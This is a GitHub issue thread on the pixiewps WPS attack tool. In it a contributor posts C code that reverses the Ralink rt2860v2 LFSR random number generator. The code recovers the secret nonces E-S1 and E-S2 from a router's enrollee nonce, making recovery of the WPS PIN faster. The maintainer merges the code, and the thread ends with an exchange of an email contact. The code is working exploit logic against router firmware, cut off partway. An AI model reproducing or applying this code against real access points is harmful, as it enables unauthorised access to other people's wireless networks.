wiire-a/pixiewps

Perfomance improvement for the ralink algo.

1yura opened this issue · 3 comments

1yura commented

You use the function ralink_randbyte for brute force seed. But you can exclude brute forcing. You can reverse the function ralink_randbyte. Look how it I did:

#define LFSR_MASK 0x80000057

static uint8_t rt2860v2RandomByte(uint32_t * ShiftReg) {
	uint8_t Result;
	uint8_t R = 0;

	for (int i = 0; i < 8; i++) {
		if ((*ShiftReg) & 0x00000001){
			*ShiftReg = (((*ShiftReg) ^ LFSR_MASK) >> 1) | 0x80000000;
			Result = 1;
		} 
		else{
			*ShiftReg = (*ShiftReg) >> 1;
			Result = 0;
		}

		R = (R << 1) | Result;
	}

	return R;
}

static uint8_t rt2860v2RandomByteBack2(uint32_t * ShiftReg){
	uint8_t Result;
	uint8_t R = 0;

	for (int i = 0; i < 8; i++){
		if ((*ShiftReg) & 0x80000000){
			*ShiftReg = (((*ShiftReg <<1) ^ LFSR_MASK)) | 0x00000001;
			Result = 1;
		} 
		else{
			*ShiftReg = (*ShiftReg) <<  1;
			Result = 0;
		}
			
		R |= Result<<i;
	}

	return R;
}


static void rt2860v2RandomByteBack(uint32_t * ShiftReg, uint8_t R){
	uint8_t Result;

	for (int i = 0; i < 8; i++) {
		Result=R&1;
		R=R>>1;

		if(Result==1){
			*ShiftReg=(((*ShiftReg)<<1)^ LFSR_MASK) | 0x00000001;
		}
		else{
			*ShiftReg = (*ShiftReg) << 1;
		}
	}
}

uint_fast8_t tryRt2860v2(struct global *wps, unsigned int *pin){
	uint32_t shiftreg=0;
	
	for(int ii=WPS_NONCE_LEN-1; ii>=0; ii--){
		rt2860v2RandomByteBack(&shiftreg, wps->e_nonce[ii]);
	}

	const uint32_t savereg=shiftreg;
	for(int ii=0; ii<WPS_NONCE_LEN; ii++){
		if(rt2860v2RandomByte(&shiftreg) != wps->e_nonce[ii]){
			DEBUG_PRINT("This is NOT the rt2860v2 algo");
			return NONE;
		}
	}

	DEBUG_PRINT("This is the rt2860v2 algo");
	shiftreg=savereg;

	for(int ii=WPS_SECRET_NONCE_LEN-1; ii>=0; ii--){
		wps->e_s2[ii]=rt2860v2RandomByteBack2(&shiftreg);
	}
	
	for(int ii=WPS_SECRET_NONCE_LEN-1; ii>=0; ii--){
		wps->e_s1[ii]=rt2860v2RandomByteBack2(&shiftreg);
	}
...
wiire-a commented

@1yura
Thanks! I didn't think it was possible but you are correct. Will be implemented soon.

wiire-a commented

@1yura
Pushed changes. Thank you again.

Is there a way I can contact you? I wanted to ask you something.

You can send me an e-mail to wi7ire@gmail.com if you're willing to talk.

1yura commented

I wrote to you by email.